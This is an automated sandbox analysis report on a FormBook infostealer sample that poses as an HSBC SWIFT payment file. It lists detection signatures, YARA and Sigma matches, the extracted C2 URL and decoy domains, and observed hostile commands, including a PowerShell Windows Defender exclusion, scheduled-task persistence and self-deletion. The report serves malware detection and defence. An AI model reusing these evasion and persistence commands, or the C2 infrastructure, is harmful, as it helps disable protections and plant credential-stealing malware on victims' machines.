Windows Analysis Report HSBC_SWIFT-20-11-2021.exe

Overview

General Information

Sample Name: HSBC_SWIFT-20-11-2021.exe
Analysis ID: 528767
MD5: 3e9bddcd8ede94beb73d43d4d3446fe7
SHA1: 27723f2fb360a300df95c22fd1d8353a5d940455
SHA256: 4518c17e858eaae9a38cdf5953bd7d0cad3c3fd5fa2b9a5b84e0cad5e8ecfc5e
Tags: exe, Formbook, HSBC

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Sigma detected: Suspicius Add Task From User AppData Temp
Self deletion via cmd delete
.NET source code contains potential unpacker
Sigma detected: Powershell Defender Exclusion
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Adds a directory exclusion to Windows Defender
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • HSBC_SWIFT-20-11-2021.exe (PID: 7156 cmdline: "C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe" MD5: 3E9BDDCD8EDE94BEB73D43D4D3446FE7)
    • powershell.exe (PID: 5828 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5576 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RdffGefdbLSx.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 4528 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RdffGefdbLSx" /XML "C:\Users\user\AppData\Local\Temp\tmp4EB8.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • HSBC_SWIFT-20-11-2021.exe (PID: 6020 cmdline: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe MD5: 3E9BDDCD8EDE94BEB73D43D4D3446FE7)
      • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msdt.exe (PID: 1972 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
          • cmd.exe (PID: 5868 cmdline: /c del "C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 3184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • explorer.exe (PID: 3120 cmdline: explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.164661.com/ntfs/"], "decoy": ["cast-host.com", "sheenwoman.com", "cateringpairs.com", "butikgamis.com", "esd66.com", "beautystaze.com", "findavetnearme.com", "lyketigers.com", "nesboutiqe.com", "jadeutil.com", "survivalfresh.com", "realestatebramlett.com", "glorynap.com", "awards.institute", "huangtapps.com", "beyondwithyou.com", "cryptocustomerhelp.com", "plataformasoma.net", "lstpark.com", "noalareelecionindefinida.com", "supersconti.xyz", "emotors-invoice.com", "adamelsouk.com", "pellondo.com", "itstimewashington.com", "ss9n.xyz", "wecuxs.com", "wonderfulwithyou.com", "livetvnews24.com", "humanblessings.com", "soins-sophro.website", "pailuanshizhi.com", "balanzasdeplataformaperu.com", "wingboxonline.com", "importexportjessi.com", "revenberggmemergencyupgrade.com", "comicvan.com", "docomoaj.xyz", "accelerate6.com", "englishforbreakfast.com", "braapboxclub.com", "damana-vetements.com", "corinnewehby.com", "tonesify.com", "growversa.com", "cemetrasbeautyboutique.com", "newbalancecore.xyz", "cqguipu.com", "vdcasinolinkegit.club", "sednayachts.com", "alinatargetpro.com", "pawcomart.com", "aisle5.store", "dayinburgas.com", "c2batxpvme9ey3poams7369.com", "everythingby-b.com", "laliinparfumeri.com", "ntwapedi.com", "mrbubblesftlauderdale.com", "averiansmom.com", "ipelle.com", "waiting-game.com", "online-security.support", "hartfortlife.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
    • 0x16af8:$sqlite3text: 68 38 2A 90 C5
    • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
    00000014.00000002.625088628.0000000003610000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000014.00000002.625088628.0000000003610000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      8.0.HSBC_SWIFT-20-11-2021.exe.400000.4.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        8.0.HSBC_SWIFT-20-11-2021.exe.400000.4.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        8.0.HSBC_SWIFT-20-11-2021.exe.400000.4.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x15cc9:$sqlite3step: 68 34 1C 7B E1
        • 0x15ddc:$sqlite3step: 68 34 1C 7B E1
        • 0x15cf8:$sqlite3text: 68 38 2A 90 C5
        • 0x15e1d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d0b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e33:$sqlite3blob: 68 53 D8 7F 8C
        8.0.HSBC_SWIFT-20-11-2021.exe.400000.6.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          8.0.HSBC_SWIFT-20-11-2021.exe.400000.6.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

          Sigma Overview

          System Summary:

          Sigma detected: Suspicius Add Task From User AppData Temp
          Source: Process started | Author: frack113 | Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RdffGefdbLSx" /XML "C:\Users\user\AppData\Local\Temp\tmp4EB8.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RdffGefdbLSx" /XML "C:\Users\user\AppData\Local\Temp\tmp4EB8.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe" , ParentImage: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe, ParentProcessId: 7156, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RdffGefdbLSx" /XML "C:\Users\user\AppData\Local\Temp\tmp4EB8.tmp, ProcessId: 4528
          Sigma detected: Powershell Defender Exclusion
          Source: Process started | Author: Florian Roth | Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe" , ParentImage: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe, ParentProcessId: 7156, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe, ProcessId: 5828
          Sigma detected: Possible Applocker Bypass
          Source: Process started | Author: juju4 | Data: Command: C:\Windows\SysWOW64\msdt.exe, CommandLine: C:\Windows\SysWOW64\msdt.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\msdt.exe, NewProcessName: C:\Windows\SysWOW64\msdt.exe, OriginalFileName: C:\Windows\SysWOW64\msdt.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3440, ProcessCommandLine: C:\Windows\SysWOW64\msdt.exe, ProcessId: 1972
          Sigma detected: Non Interactive PowerShell
          Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe" , ParentImage: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe, ParentProcessId: 7156, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe, ProcessId: 5828
          Sigma detected: T1086 PowerShell Execution
          Source: Pipe created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: PipeName: \PSHost.132823685347918465.5828.DefaultAppDomain.powershell

          Jbx Signature Overview


          AV Detection:

          Found malware configuration
          Source: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp | Malware Configuration Extractor: FormBook (configuration as listed in the Malware Configuration section above)
          Yara detected FormBook
          Source: Yara match | File source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.2.HSBC_SWIFT-20-11-2021.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 8.2.HSBC_SWIFT-20-11-2021.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000014.00000002.625088628.0000000003610000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000000.412407613.0000000007682000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000000.380797387.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.384803178.0000000003FCD000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000014.00000002.624991985.00000000035E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.385092750.0000000004232000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000A.00000000.432842993.0000000007682000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.476496897.00000000017D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000000.381918997.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.476370956.0000000001590000.00000040.00020000.sdmp, type: MEMORY
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.8.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.4.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 8.2.HSBC_SWIFT-20-11-2021.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.6.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
          Source: HSBC_SWIFT-20-11-2021.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: HSBC_SWIFT-20-11-2021.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: msdt.pdbGCTL source: HSBC_SWIFT-20-11-2021.exe, 00000008.00000002.479620363.0000000003930000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: HSBC_SWIFT-20-11-2021.exe, 00000008.00000002.477765474.000000000198F000.00000040.00000001.sdmp, HSBC_SWIFT-20-11-2021.exe, 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, msdt.exe, 00000014.00000002.627202964.00000000053F0000.00000040.00000001.sdmp, msdt.exe, 00000014.00000003.475842542.00000000050C0000.00000004.00000001.sdmp, msdt.exe, 00000014.00000002.629817947.000000000550F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: HSBC_SWIFT-20-11-2021.exe, HSBC_SWIFT-20-11-2021.exe, 00000008.00000002.477765474.000000000198F000.00000040.00000001.sdmp, HSBC_SWIFT-20-11-2021.exe, 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, msdt.exe, msdt.exe, 00000014.00000002.627202964.00000000053F0000.00000040.00000001.sdmp, msdt.exe, 00000014.00000003.475842542.00000000050C0000.00000004.00000001.sdmp, msdt.exe, 00000014.00000002.629817947.000000000550F000.00000040.00000001.sdmp
          Source: Binary string: msdt.pdb source: HSBC_SWIFT-20-11-2021.exe, 00000008.00000002.479620363.0000000003930000.00000040.00020000.sdmp

          Networking:

          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractor | URLs: www.164661.com/ntfs/
          Source: explorer.exe, 0000001C.00000000.610554099.000000000600C000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: HSBC_SWIFT-20-11-2021.exe, 00000000.00000002.384226199.0000000002FC1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 0000000A.00000000.405790270.000000000095C000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.423799260.000000000095C000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.385812561.000000000095C000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.455497902.000000000095C000.00000004.00000020.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match (the same seven UNPACKEDPE and twelve MEMORY sources as listed under AV Detection above)

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 8.2.HSBC_SWIFT-20-11-2021.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.2.HSBC_SWIFT-20-11-2021.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 8.2.HSBC_SWIFT-20-11-2021.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.2.HSBC_SWIFT-20-11-2021.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000002.625088628.0000000003610000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000002.625088628.0000000003610000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.412407613.0000000007682000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000000.412407613.0000000007682000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000000.380797387.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000000.380797387.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.384803178.0000000003FCD000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.384803178.0000000003FCD000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000002.624991985.00000000035E0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000002.624991985.00000000035E0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.385092750.0000000004232000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.385092750.0000000004232000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.432842993.0000000007682000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000000.432842993.0000000007682000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.476496897.00000000017D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.476496897.00000000017D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000000.381918997.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000000.381918997.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.476370956.0000000001590000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.476370956.0000000001590000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: HSBC_SWIFT-20-11-2021.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.2.HSBC_SWIFT-20-11-2021.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 8.2.HSBC_SWIFT-20-11-2021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
